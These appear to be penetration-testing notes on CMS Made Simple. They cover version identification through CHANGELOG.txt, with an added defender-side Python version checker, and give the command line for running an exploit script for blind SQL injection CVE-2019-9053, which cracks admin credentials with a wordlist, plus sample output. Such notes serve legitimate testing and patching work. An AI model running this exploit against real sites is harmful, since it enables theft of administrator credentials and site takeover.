CMS Made Simple

What it is: Lightweight CMS for small websites. Versions below 2.2.10 are known for a blind SQL injection vulnerability (CVE-2019-9053) that exposes admin credentials.

Default ports: 80, 443

Vuln research:

Identify version

Check /doc/CHANGELOG.txt — Version determines SQLi availability

curl -s http://$IP/doc/CHANGELOG.txt | head -10
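Added example (not part of the original notes): a defender-side check that parses the version out of the CHANGELOG.txt the note above points at and compares it against 2.2.10 as integer tuples, so that 2.2.9 is flagged while 2.2.10 is not. The changelog snippet is constructed and the "Version X.Y.Z" header pattern is an assumption about the file layout.

```python
import re
import urllib.request

# Releases below this one are affected by CVE-2019-9053 (per the notes above).
FIXED_VERSION = (2, 2, 10)

# Constructed sample of the first lines of /doc/CHANGELOG.txt. The real file's
# layout may differ; the parser only relies on a "Version X.Y.Z" token appearing
# before any older release entries (assumption).
SAMPLE_CHANGELOG = """\
Version 2.2.9 (constructed sample)
----------------------------------
- assorted fixes
Version 2.2.8
"""


def parse_version(changelog_text):
    """Return the first 'Version X.Y.Z' found as a tuple of ints, or None."""
    m = re.search(r"\bVersion\s+(\d+(?:\.\d+)+)", changelog_text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version):
    """Compare as tuples: a plain string comparison would rank '2.2.9' above '2.2.10'."""
    return version < FIXED_VERSION


def check_changelog(changelog_text):
    """Summarise what an admin needs to know: the detected version and whether to patch."""
    version = parse_version(changelog_text)
    if version is None:
        return {"version": None, "vulnerable": None}
    return {"version": ".".join(map(str, version)), "vulnerable": is_vulnerable(version)}


def check_site(base_url, timeout=5):
    """Fetch /doc/CHANGELOG.txt from your own CMS install and run the check (network, not used offline)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/doc/CHANGELOG.txt", timeout=timeout) as resp:
        return check_changelog(resp.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    print(check_changelog(SAMPLE_CHANGELOG))
```

A result of `vulnerable: True` means the install should be upgraded to 2.2.10 or later; `None` means the changelog was missing or unparseable and the version must be confirmed another way.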

SQLi (CVE-2019-9053)

Blind SQLi on CMS Made Simple < 2.2.10 — Dumps admin credentials

python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt

Example Output
[+] Salt for password found: xxxxxxxx
[+] Username found: admin
[+] Email found: admin@site.com
[+] Password found: SuperSecret